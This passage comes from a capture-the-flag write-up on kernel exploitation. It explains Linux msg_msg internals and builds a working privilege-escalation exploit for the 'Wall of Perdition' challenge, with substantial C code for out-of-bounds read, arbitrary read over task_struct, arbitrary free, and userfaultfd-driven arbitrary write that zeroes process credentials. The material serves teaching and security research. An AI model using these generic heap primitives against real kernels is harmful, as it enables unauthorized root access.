			msg = ERR_PTR(-ERESTARTNOHAND);
			goto out_unlock0;
		}

		ipc_unlock_object(&msq->q_perm);
	}

out_unlock0:
	ipc_unlock_object(&msq->q_perm);
	wake_up_q(&wake_q);
out_unlock1:
	rcu_read_unlock();
	if (IS_ERR(msg)) {
		free_copy(copy);
		return PTR_ERR(msg);
	}

	bufsz = msg_handler(buf, msg, bufsz); // [2]
	free_msg(msg); // [3]

	return bufsz;
}

As we can see from the source code above, in do_msgrcv() the kernel uses find_msg() to locate the correct message [1], then, on success, after performing some checks and unlinking the requested message from the message queue, it calls msg_handler(), previously set to do_msg_fill() to copy the message from kernel space to user space [2]:

static long do_msg_fill(void __user *dest, struct msg_msg *msg, size_t bufsz)
{
	struct msgbuf __user *msgp = dest;
	size_t msgsz;

	if (put_user(msg->m_type, &msgp->mtype))
		return -EFAULT;

	msgsz = (bufsz > msg->m_ts) ? msg->m_ts : bufsz; // [1]
	if (store_msg(msgp->mtext, msg, msgsz)) // [2]
		return -EFAULT;
	return msgsz;
}

do_msg_fill(), checks if the requested message size is greater than the size saved in msg->m_ts [1]. If the requested size exceeds the size saved in the message header, it will only copy m_ts bytes, otherwise it will use the size provided by the user. This check is necessary to avoid an Out Of Bounds Read when the user calls msgrcv(). In our case, msgsz will be 0x1fc8 bytes.

Finally, store_msg() is called [2]. It is ready to copy msgsz bytes (0x1fc8 in our case) from kernel space to the buffer provided by the user in user space:

int store_msg(void __user *dest, struct msg_msg *msg, size_t len)
{
	size_t alen;
	struct msg_msgseg *seg;

	alen = min(len, DATALEN_MSG); // [1]
	if (copy_to_user(dest, msg + 1, alen)) // [2]
		return -1;

	for (seg = msg->next; seg != NULL; seg = seg->next) { // [3]
		len -= alen;
		dest = (char __user *)dest + alen;
		alen = min(len, DATALEN_SEG); // [4]
		if (copy_to_user(dest, seg + 1, alen)) // [5]
			return -1;
	}
	return 0;
}

store_msg(), based on the size of alen [1] (0xfd0 in our case, exactly as we have seen in load_msg() and alloc_msg()), starts copying the message data from kernel space to the user buffer using copy_to_user() [2]. Then it starts traversing the list of segments until there are no more segments left [3], calculating every time the size of alen [4] and copying the segment data to the user buffer [5]. In our case there is only one segment from which to copy 0xff8 bytes.

Once the procedure is successfully completed, as we can see in the do_msgrcv() source code above (you need to scroll up a bit), it calls free_msg() [3] to deallocate the message and its respective segment:

void free_msg(struct msg_msg *msg)
{
    struct msg_msgseg *seg;

    security_msg_msg_free(msg);

    seg = msg->next;
    kfree(msg);  // [1]
    while (seg != NULL) { // [2]
    	struct msg_msgseg *tmp = seg->next;

    	cond_resched();
    	kfree(seg); // [3]
    	seg = tmp;
    }
}

Initially free_msg() uses kfree() to free the message [1], then it starts traversing the singly linked list of segments [2] using kfree() to deallocate each segment [3].

Now is very important to note, that if we call msgrcv() with the flag MSG_COPY, for example as follows:

void *memdump = malloc(0x1fc8);
msgrcv(qid, memdump, 0x1fc8, 1, IPC_NOWAIT | MSG_COPY | MSG_NOERROR);

the kernel will not destroy our message. As we can see from the do_msgrcv() source code above (again, you need to scroll up a bit), it will use prepare_copy() to allocate a temporary message [4], and then it will call copy_msg() to copy the content of the requested message (using memcpy()) into the copy, this way, after copying the message to user space, the original message will be preserved, not being unlinked from the queue, and the copy will be destroyed by free_msg() instead of the original one. This will be extremely important in the exploitation phase.

P.S. It is possible to use the MSG_COPY flag only if the kernel is compiled with CONFIG_CHECKPOINT_RESTORE, which is true by default in many Linux distributions.

The Exploit: Out Of Bounds Read

At this point, after analyzing the code used by the kernel to perform message operations, it is quite clear how an UAF exploited by an attacker to corrupt the message metadata, can have catastrophic effects. In the next sections, corrupting fields in the msg_msg structure, we will be able to find the address of the current task in memory and override its credentials with zeroes to get root privileges.

How to get arbitrary read by corrupting the m_ts field and the next field of the msg_msg structure has already been shown by the Linux kernel developer and security researcher Alexander Popov in his amazing article Four Bytes of Power: Exploiting CVE-2021-26708 in the Linux kernel. He also shown how to obtain a powerful arbitrary free primitive exploiting the security pointer of the msg_msg structure. Unfortunately, if SELinux is disabled, like in our case, the security pointer will always be NULL.

As we read this article, we began to wonder what other primitives it would be possible to obtain from this elastic object, so we started to study source code and after many experiments we managed to turn it into a powerful exploitation toolkit.

Since the firewall doesn’t offer any function we can exploit to get a leak (remember, show_rule() is exposed but not implemented), we can cause the UAF, then we can allocate a message using msgsnd() and corrupt its m_ts field using edit_rule(), to get a powerful Out Of Bounds Read primitive when we call msgrcv():

[...]

void send_msg(int qid, int size, int c)
{
    struct msgbuf
    {
        long mtype;
        char mtext[size - 0x30];
    } msg;

    msg.mtype = 1;
    memset(msg.mtext, c, sizeof(msg.mtext));

    if (msgsnd(qid, &msg, sizeof(msg.mtext), 0) == -1)
    {
        perror("msgsnd");
        exit(1);
    }
}

[...]

// [1]
if ((qid[0] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)
{
    perror("msgget");
    exit(1);
}

if ((qid[1] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)
{
    perror("msgget");
    exit(1);
}

// [2]
add_rule(0, buff, INBOUND);
duplicate_rule(0, INBOUND);
delete_rule(0, INBOUND);

send_msg(qid[0], 0x40, 'A'); // [2]
send_msg(qid[1], 0x40, 'B'); // [4]
send_msg(qid[1], 0x1ff8, 0); // [5]

[...]

As we can see from the code above, first of all we create two queues using msgget() [1], we will identify the first one with QID #0 and the second one with QID #1.

Then, we use add_rule() to add a valid inbound rule, this will store a pointer to the rule in firewall_rules_in, then we use duplicate_rule() to duplicate it in firewall_rule_out, and then we free it using delete_rule(). Despite the pointer being set to NULL in firewall_rules_in, it will still be accessible in firewall_rule_out [1]. Our UAF is ready for being exploited.

At this point we can use our function send_msg() (a msgsnd() wrapper), to allocate three messages. We allocate a first message of 0x40 bytes (0x30 bytes of header and 0x10 bytes of data) in the first queue (QID #0) [2]. Since we just freed our rule, and slab feelists have a LIFO behavior, it will be allocated at the same address in kmalloc-64. With this move, we have full control over the message header, the msg_msg structure.

Now we allocate two other messages in QID #1, a first message of 0x40 bytes (again, 0x30 bytes of header and 0x10 bytes of data), that will be allocated always in kmalloc-64, and another one of 0x1ff8 bytes (0x30 bytes of header and 0x1fc8 bytes of data) [2]. At this point the situation in memory should be the following (Because of freelist randomization, the first message may be allocated after the second one and our leak attempt may fail, in this case we simply need to delete the second queue and run the exploit again):

debug

In the diagram above, in orange, we can see the message header of the first message in QID #0. We can have full control over this object using edit_rule(). Always in kmalloc-64, we can also see the other message, belonging to QID #1. The m_list.prev field of this message, points to its message queue, QID #1. Instead, the m_list.next field of this message, points to the second message in QID #1, the large message in kmalloc-4096. This message has a pointer to a segment, always in kmalloc-4096 (We have already explained how the segmentation of messages larger than 0x1000 bytes (considering message header + message data) works in the previous section).

We are ready to get a memory leak exploiting a Out Of Bounds Read:

[...]

void *recv_msg(int qid, size_t size)
{
    void *memdump = malloc(size);

    if (msgrcv(qid, memdump, size, 0, IPC_NOWAIT | MSG_COPY | MSG_NOERROR) == -1)
    {
        perror("msgrcv");
        return NULL;
    }

    return memdump;
}

[...]

uint64_t *arb_read(int idx, uint64_t target, size_t size, int overwrite)
{
    struct evil_msg *msg = (struct evil_msg *)malloc(0x100);

    msg->m_type =  0;
    msg->m_ts = size; // [2]

    if (overwrite)
    {
        msg->next = target;
        edit_rule(idx, (unsigned char *)msg, OUTBOUND, 0);
    }
    else
    {
        edit_rule(idx, (unsigned char *)msg, OUTBOUND, 1); // [3]
    }

    free(msg);

    return recv_msg(qid[0], size); // [4]
}

[...]

uint64_t *leak = arb_read(0, 0, 0x2000, 0); // [1]

[...]

Using the function arb_read() [1] with a size argument of 0x2000 bytes, we can overwrite the m_ts field of our target object [2] thanks to edit_rule() [3]. Then, calling recv_msg() (a msgrcv() wrapper) [4], we can get a memory leak. It’s important to note that in recv_msg() we are using the MSG_COPY flag: overwriting our target object, we are corrupting its m_list.next and m_list.prev fields, so if we don’t use MSG_COPY, do_msgrcv() will try to unlink the message from the queue, causing a crash.

debug

As we can see from the figure above, we overwritten the m_ts size field in the msg_msg structure of our target, this will give us a powerful Out Of Bounds Read primitive when we call recv_msg(). This way, we can leak the m_list.next field of the message in QID #1 (the address of the large message in kmalloc-4096), we can leak the m_list.prev field (the pointer to QID #1), and finally we can leak sysfs_bin_kfops_ro. Because this symbol resides in the kernel data section, and this section is not affected by FGKASLR, we can use it to calculate kernel base, or to calculate the address of other symbols always in the data section.

The Exploit: From Out Of Bounds Read To Arbitrary Read

In the previous section, among other things, we leaked the address of sysfs_bin_kfops_ro. We can use it to calculate the address of init_task. init_task corresponds to the address of the first process executed by the system. In Linux every task is defined by the structure task_struct, and tasks are linked together in a circular doubly linked list.

In this discussion we are interested in three fields of task_struct: tasks, a structure that contains pointers to the previous and next task. pid, the process identifier, and cred, a structure that contains the credentials of the process (uid,gid,suid,sgid and so on).

[...]

uint64_t find_current_task(uint64_t init_task)
{
    pid_t pid, next_task_pid;
    uint64_t next_task;

    pid = getpid();

    printf("[+] Current task PID: %d\n", pid);
    puts("[*] Traversing tasks...");

    leak = arb_read(0, init_task + 8, 0x1500, 1) + 0x1f9;
    next_task = leak[0x298/8] - 0x298;

    leak = arb_read(0, next_task + 8, 0x1500, 1) + 0x1f9;
    next_task_pid = leak[0x398/8];

    while (next_task_pid != pid) // [2]
    {
        next_task = leak[0x298/8] - 0x298; // [3]
        leak = arb_read(0, next_task + 8, 0x2000, 1) + 0x1f9;
        next_task_pid = leak[0x398/8]; // [4]
    }

    puts("[+] Current task found!");

    return next_task;
}

[...]

puts("[*] Locating current task address...");
uint64_t current_task = find_current_task(init_task); // [1]
printf("[+] Leaked current task address: 0x%lx\n", current_task);

[...]

In the source code above, we use the function find_current_task() [1] to traverse all tasks, starting from init_task until we find the current one [2]. To succeed in this goal, find_current_task() uses arb_read() multiple times, overwriting the m_ts field and the next pointer of our target object msg_msg, and for each task it leaks the pointer to the next task [3] and its PID [4], then it compares the leaked PID with the PID of the current task until there is a match:

debug

In the figure above we can see that now the m_ts field of our target object is set to 0x2000 and its segment pointer, points to init_task. This way when we call msgrcv(), the kernel in store_msg() will not only copy 0xfd0 bytes from the message to the user buffer (causing another OOB Read), but this time it will also copy 0xff8 bytes from fake segment: init_task.

Once we found the current task, we can use our arbitrary read primitive to leak its cred structure, overwriting the m_ts field of msg_msg with 0x2000 and the pointer to the segment with the address of the current task:

[...]

leak = arb_read(0, current_task, 0x2000, 1) + 0x1fa;
cred_struct = leak[0x540/8];
printf("[+] Leaked current task cred struct: 0x%lx\n", cred_struct);

[...]

debug

The Exploit: Arbitrary Free

At this point we have the address of the current task and its cred structure, now we need to obtain arbitrary write, but succeeding in this goal is not so simple. First we need to get an arbitrary free primitive. To do so we need to use msgrcv() (without the MSG_COPY flag) two times:

[...]

msgrcv(qid[1], memdump, 0x1ff8, 1, IPC_NOWAIT | MSG_NOERROR); // [1]
msgrcv(qid[1], memdump, 0x1ff8, 1, IPC_NOWAIT | MSG_NOERROR); // [2]

[...]

The first time we call msgrcv() [1], the kernel will free the first message (in kmalloc-64) belonging to QID #1. When we call it for the second time [2], the kernel will free the second message (in kmalloc-4096) and its respective segment (in kmalloc-4096), always belonging to QID #1. The result in memory will be the following:

debug

Now, this is a very important step and can be quite confusing. In the first part of the exploit, we leaked the address of the message in kmalloc-4096. In the previous step, when we used msgrcv() for the second time, the kernel in free_msg(), at the end of do_msgrcv(), first used kfree() free the message in kmalloc-4096 and then it freed its segment. Because slab freelists have a LIFO behavior, and we are going allocate a new message (in kmalloc-4096) which in turn will have a segment (always in kmalloc-4096), the new message will be allocated at the address where the segment was before, and the new segment will be allocated at the address where the message was before.

In other words, since we previously leaked the address of the message in kmalloc-4096, and when we free (with msgrcv()) and we re-allocate (with msgsnd()) the positions are swapped, what we know when we re-allocate (with msgsnd()) is the address of the new segment in kmalloc-4096. For a visual representation, let’s say that we initially leaked the address of the green square:

debug

Now that we clarified this important point, we can use pthread to allocate a new message and its respective segment in kmalloc-4096:

[...]

void *allocate_msg1(void *_)
{
    printf("[Thread 1] Message buffer allocated at 0x%lx\n", page_1 + PAGE_SIZE - 0x10);

    if ((qid[2] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1) // [2]
    {
        perror("msgget");
        exit(1);
    }

    memset(page_1, 0, PAGE_SIZE);
    ((unsigned long *)(page_1))[0xff0 / 8] = 1;

    if (msgsnd(qid[2], page_1 + PAGE_SIZE - 0x10, 0x1ff8 - 0x30, 0) < 0) // [3]
    {
        puts("msgsend failed!");
        perror("msgsnd");
        exit(1);
    }

    puts("[Thread 1] Message sent, *next overwritten!");
}

[...]

pthread_create(&tid[2], NULL, allocate_msg1, NULL); // [1]

[...]

As we can see from the code above, we create a new thread using pthread [1]. In the allocate_msg1() function, we first create a new queue [2], QID #2, then we use msgsnd() [3] to create a message of 0x1ff8 bytes (0x30 bytes of header and 0x1fc8 bytes of data), that in kernel space will result in a message of 0x1000 bytes (0x30 bytes of header and 0xfd0 bytes of data) (in kmalloc-4096) and a segment of 0x1000 bytes (0x8 bytes for the next pointer and 0xff8 bytes of data) (always in kmalloc-4096).

The location page_1 + PAGE_SIZE - 0x10 is not random, we are using userfaultfd to monitor the location page_1 + PAGE_SIZE, waiting for a page fault. This way, when load_msg() will try to copy our message from user space to the message in kernel space, it will cause a page fault, and we will be able to hang the call to copy_from_user(). This will result in the following situation (Remember that now we know the address of the new segment for the reasons explained above):

debug

Finally we are ready to use our powerful arbitrary free primitive:

[...]

void arb_free(int idx, uint64_t target)
{
    struct evil_msg *msg = (struct evil_msg *)malloc(0x100);
    void *memdump = malloc(0x2000);

    msg->m_list.next = queue; // [2]
    msg->m_list.prev = queue;
    msg->m_type =  1;
    msg->m_ts = 0x10;
    msg->next = target; // [3]

    edit_rule(idx, (unsigned char *)msg, OUTBOUND, 0); // [4]

    puts("[*] Triggering arb free...");
    msgrcv(qid[0], memdump, 0x10, 1, IPC_NOWAIT | MSG_NOERROR); // [5]
    puts("[+] Target freed!");

    free(memdump);
    free(msg);
}

[...]

arb_free(0, large_msg); // [1]

[...]

We call the function arb_free() [1], targeting the previously leaked message object, that now contains the new segment. We use the message queue we leaked in the first part of our exploit, to fix the m_list.next and m_list.prev fields of the msg_msg structure [2], this will allow us to use msgrcv() on the message in QID #0 without the MSG_COPY flag, to free it without crashing the kernel during the unlinking procedure. Then we set the next pointer (the pointer to the segment) to our target [3], the new segment in kmalloc-4096.

When we use edit_rule() to overwrite msg_msg [4] the situation in memory will be the following:

debug

Now we can finally call msgrcv() without the MSG_COPY flag [5]. The kernel will be able to unlink the message from the queue and then it will call free_msg() freeing the message in QID #0 and the new segment:

debug

The Exploit: From Arbitrary Free To Arbitrary Write

Now the next pointer of our message in kmalloc-4096, is pointing to a free object (the object we just freed with our powerful arbitrary free primitive). We can create a new thread using pthread, and allocate another message in kmalloc-4096:

[...]

void *allocate_msg2(void *_)
{
    printf("[Thread 2] Message buffer allocated at 0x%lx\n", page_2 + PAGE_SIZE - 0x10);

    if ((qid[3] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1) // [2]
    {
        perror("msgget");
        exit(1);
    }

    memset(page_2, 0, PAGE_SIZE);
    ((unsigned long *)(page_2))[0xff0 / 8] = 1;

    if (msgsnd(qid[3], page_2 + PAGE_SIZE - 0x10, 0x1028 - 0x30, 0) < 0) // [3]
    {
        puts("msgsend failed!");
        perror("msgsnd");
        exit(1);
    }

    puts("[Thread 2] Message sent, target overwritten!");
}

[...]

pthread_create(&tid[3], NULL, allocate_msg2, NULL); // [1]

[...]

As we did before, we create a new thread [1], then in allocate_msg2() we create another queue, QID #3 [2] and then we use msgsend() to allocate a 0x1028 bytes message [3] (0x30 bytes of header and 0xff8 of data). In kernel space this message will result in a 0x1000 bytes message (0x30 bytes of header and 0xfd0 bytes of data), that will be allocated at the same address as the segment we freed with our arbitrary free primitive, and a 0x30 bytes segment (0x8 bytes for the next pointer and 0x28 bytes of data) that will be allocated in kmalloc-64. Even this time, our buffer is located at page_2 + PAGE_SIZE - 0x10 because we are monitoring page_2 + PAGE_SIZE with another userfaultfd thread, waiting for a page fault. Exactly as we did before, when load_msg() will try to copy our message in kernel space, it will cause a page fault and we will be able to hang the copy_from_user() call.

When the call to load_msg() hits our monitored page, it will cause the following situation:

debug

At this point, we can finally release the first faulting thread, this way we will be able to overwrite the next pointer of the message we have just allocated in kmalloc-4096 with the address of the cred structure of the current task - 0x8 bytes:

[...]

        if (page_fault_location == page_1 + PAGE_SIZE)
        {
            printf("[PFH 1] Page fault at 0x%lx\n", page_fault_location);
            memset(buff, 0, PAGE_SIZE);

            puts("[PFH 1] Releasing faulting thread");

            struct evil_msg *msg = (struct evil_msg *)(buff + 0x1000 - 0x40);

            msg->m_type =  0x1;
            msg->m_ts = 0x1000;
            msg->next = (uint64_t)(cred_struct - 0x8); // [1]

            ufd_copy.dst = (unsigned long)(page_fault_location);
            ufd_copy.src = (unsigned long)(&buff);
            ufd_copy.len = PAGE_SIZE;
            ufd_copy.mode = 0;
            ufd_copy.copy = 0;

            for (;;)
            {
                if (release_pfh_1)
                {
                    if (ioctl(ufd, UFFDIO_COPY, &ufd_copy) < 0)
                    {
                        perror("ioctl(UFFDIO_COPY)");
                        exit(1);
                    }

                    puts("[PFH 1] Faulting thread released");
                    break;
                }
            }
        }

[...]

It’s important to note that we are subtracting 8 bytes [1] because we need the first QWORD in the segment to be NULL, otherwise load_msg() will try to access the next segment causing a crash. Once we release the faulting thread, this is how the memory will look like:

debug

As we can see from the diagram above, now the next pointer of the message in #QID 3 points to the cred structure of the current task. We have finally reached the end, the last step is predictable, as you can imagine, we release the second faulting thread overwriting the credentials of the current process with zeroes. This, will give us root privileges:

debug

Here is the exploit in action:

debug

Here you can find the complete exploit: wall_of_perdition_exploit.c

Conclusion

The technique described in the previous sections is applicable in many caches, starting from kmalloc-64 up to kmalloc-4096. In the specific case of kmalloc-4096, the exploitation turns out to be simpler, to learn more, I recommend you to read the awesome writeup of Fire of Salvation by FizzBuzz101. It is worth noting that in a less protected environment, such as common Linux distributions (with CONFIG_STATIC_USERMODEHELPER unset, without FGKASLR so on), you can simplify the technique by targeting modrpobe_path, core_pattern etc, instead of targeting the current task’s credentials. For any question or clarification feel free to contact me (check About).

Challenges links: Fire of Salvation / Wall of Perdition

References

SMAP / SMEP

FGKASLR

NetFilter

CVE-2021-26708 by a13xp0p0v